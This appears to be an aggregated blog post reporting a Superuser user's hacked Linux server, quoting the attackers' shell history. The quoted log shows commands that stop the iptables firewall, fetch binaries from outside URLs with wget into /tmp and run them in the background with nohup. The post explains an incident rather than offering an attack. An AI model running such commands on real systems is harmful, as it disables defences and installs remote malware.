Usually network infrastructure teams try to piece together how they were hacked, but one developer over on Superuser found themselves the audience to exactly how a major hack on their infrastructure unfolded.
User Vaid asked on Superuser if their server was compromised after walking away for an hour break and coming back to hundreds of commands written in the terminal window — it turns out that the server was indeed hacked:
355 service iptables stop 356 cd /tmp 357 wget http://ift.tt/1orkiTD 358 chmod 0755 /tmp/yjz1 359 nohup /tmp/yjz1 > /dev/null 2>&1 & 360 chmod 777 yjz1 361 ./yjz1 362 chmod 0755 /tmp/yjz1 363 nohup /tmp/yjz1 > /dev/null 2>&1 & 364 chmod 0777 yjz1 365 chmod u+x yjz1 366 ./yjz1 & 367 chmod u+x yjz1 368 ./yjz1 & 369 wget http://ift.tt/1SIi0fQ 370 chmod 0755 /tmp/yjz 371 nohup /tmp/yjz > /dev/null 2>&1 &
There were hundreds of these types of commands in the terminal, which may look like gibberish if you’re not familiar with Linux. In brief, the attackers broke into the server, stopped the firewall and proceeded to download and execute malicious code repeatedly. For the full article click here
from hacker samurai http://ift.tt/1LgUCxK
via IFTTT
No comments:
Post a Comment